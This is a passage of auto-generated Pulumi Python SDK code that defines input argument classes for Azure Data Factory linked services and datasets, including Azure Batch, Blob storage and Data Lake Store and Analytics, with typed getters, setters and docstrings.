pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="secretAccessKey")
def secret_access_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The secret access key of the Amazon S3 Identity and Access Management (IAM) user.
"""
return pulumi.get(self, "secret_access_key")
@secret_access_key.setter
def secret_access_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "secret_access_key", value)
@pulumi.input_type
class AvroFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
deserializer: Optional[Any] = None,
serializer: Optional[Any] = None):
"""
The data stored in Avro format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'AvroFormat')
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@pulumi.input_type
class AzureBatchLinkedServiceArgs:
def __init__(__self__, *,
account_name: Any,
batch_uri: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
pool_name: Any,
type: pulumi.Input[str],
access_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Azure Batch linked service.
:param Any account_name: The Azure Batch account name. Type: string (or Expression with resultType string).
:param Any batch_uri: The Azure Batch URI. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: The Azure Storage linked service reference.
:param Any pool_name: The Azure Batch pool name. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_key: The Azure Batch account access key.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "batch_uri", batch_uri)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "pool_name", pool_name)
pulumi.set(__self__, "type", 'AzureBatch')
if access_key is not None:
pulumi.set(__self__, "access_key", access_key)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Any:
"""
The Azure Batch account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Any):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="batchUri")
def batch_uri(self) -> Any:
"""
The Azure Batch URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "batch_uri")
@batch_uri.setter
def batch_uri(self, value: Any):
pulumi.set(self, "batch_uri", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
The Azure Storage linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="poolName")
def pool_name(self) -> Any:
"""
The Azure Batch pool name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "pool_name")
@pool_name.setter
def pool_name(self, value: Any):
pulumi.set(self, "pool_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessKey")
def access_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The Azure Batch account access key.
"""
return pulumi.get(self, "access_key")
@access_key.setter
def access_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_key", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureBlobDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_name: Optional[Any] = None,
folder_path: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None,
table_root_location: Optional[Any] = None):
"""
The Azure Blob storage.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the blob storage.
:param pulumi.Input[str] description: Dataset description.
:param Any file_name: The name of the Azure Blob. Type: string (or Expression with resultType string).
:param Any folder_path: The path of the Azure Blob storage. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the Azure Blob storage.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
:param Any table_root_location: The root of blob path. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureBlob')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if folder_path is not None:
pulumi.set(__self__, "folder_path", folder_path)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
if table_root_location is not None:
pulumi.set(__self__, "table_root_location", table_root_location)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the blob storage.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the Azure Blob. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Optional[Any]:
"""
The path of the Azure Blob storage. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Optional[Any]):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the Azure Blob storage.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@property
@pulumi.getter(name="tableRootLocation")
def table_root_location(self) -> Optional[Any]:
"""
The root of blob path. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_root_location")
@table_root_location.setter
def table_root_location(self, value: Optional[Any]):
pulumi.set(self, "table_root_location", value)
@pulumi.input_type
class AzureDataLakeAnalyticsLinkedServiceArgs:
def __init__(__self__, *,
account_name: Any,
tenant: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
data_lake_analytics_uri: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
resource_group_name: Optional[Any] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
subscription_id: Optional[Any] = None):
"""
Azure Data Lake Analytics linked service.
:param Any account_name: The Azure Data Lake Analytics account name. Type: string (or Expression with resultType string).
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any data_lake_analytics_uri: Azure Data Lake Analytics URI. Type: string (or Expression with resultType string).
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any resource_group_name: Data Lake Analytics account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any service_principal_id: The ID of the application used to authenticate against the Azure Data Lake Analytics account. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the application used to authenticate against the Azure Data Lake Analytics account.
:param Any subscription_id: Data Lake Analytics account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "tenant", tenant)
pulumi.set(__self__, "type", 'AzureDataLakeAnalytics')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if data_lake_analytics_uri is not None:
pulumi.set(__self__, "data_lake_analytics_uri", data_lake_analytics_uri)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Any:
"""
The Azure Data Lake Analytics account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Any):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter
def tenant(self) -> Any:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Any):
pulumi.set(self, "tenant", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="dataLakeAnalyticsUri")
def data_lake_analytics_uri(self) -> Optional[Any]:
"""
Azure Data Lake Analytics URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "data_lake_analytics_uri")
@data_lake_analytics_uri.setter
def data_lake_analytics_uri(self, value: Optional[Any]):
pulumi.set(self, "data_lake_analytics_uri", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[Any]:
"""
Data Lake Analytics account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[Any]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the application used to authenticate against the Azure Data Lake Analytics account. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the application used to authenticate against the Azure Data Lake Analytics account.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter(name="subscriptionId")
def subscription_id(self) -> Optional[Any]:
"""
Data Lake Analytics account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "subscription_id")
@subscription_id.setter
def subscription_id(self, value: Optional[Any]):
pulumi.set(self, "subscription_id", value)
@pulumi.input_type
class AzureDataLakeStoreDatasetArgs:
def __init__(__self__, *,
folder_path: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
file_name: Optional[Any] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Azure Data Lake Store dataset.
:param Any folder_path: Path to the folder in the Azure Data Lake Store. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used for the item(s) in the Azure Data Lake Store.
:param pulumi.Input[str] description: Dataset description.
:param Any file_name: The name of the file in the Azure Data Lake Store. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of the Data Lake Store.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "folder_path", folder_path)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureDataLakeStoreFile')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if file_name is not None:
pulumi.set(__self__, "file_name", file_name)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="folderPath")
def folder_path(self) -> Any:
"""
Path to the folder in the Azure Data Lake Store. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "folder_path")
@folder_path.setter
def folder_path(self, value: Any):
pulumi.set(self, "folder_path", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used for the item(s) in the Azure Data Lake Store.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="fileName")
def file_name(self) -> Optional[Any]:
"""
The name of the file in the Azure Data Lake Store. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "file_name")
@file_name.setter
def file_name(self, value: Optional[Any]):
pulumi.set(self, "file_name", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of the Data Lake Store.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureDataLakeStoreLinkedServiceArgs:
def __init__(__self__, *,
data_lake_store_uri: Any,
type: pulumi.Input[str],
account_name: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
resource_group_name: Optional[Any] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
subscription_id: Optional[Any] = None,
tenant: Optional[Any] = None):
"""
Azure Data Lake Store linked service.
:param Any data_lake_store_uri: Data Lake Store service URI. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param Any account_name: Data Lake Store account name. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any resource_group_name: Data Lake Store account resource group name (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any service_principal_id: The ID of the application used to authenticate against the Azure Data Lake Store account. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the application used to authenticate against the Azure Data Lake Store account.
:param Any subscription_id: Data Lake Store account subscription ID (if different from Data Factory account). Type: string (or Expression with resultType string).
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "data_lake_store_uri", data_lake_store_uri)
pulumi.set(__self__, "type", 'AzureDataLakeStore')
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if subscription_id is not None:
pulumi.set(__self__, "subscription_id", subscription_id)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="dataLakeStoreUri")
def data_lake_store_uri(self) -> Any:
"""
Data Lake Store service URI. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "data_lake_store_uri")
@data_lake_store_uri.setter
def data_lake_store_uri(self, value: Any):
pulumi.set(self, "data_lake_store_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[Any]:
"""
Data Lake Store account name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[Any]):
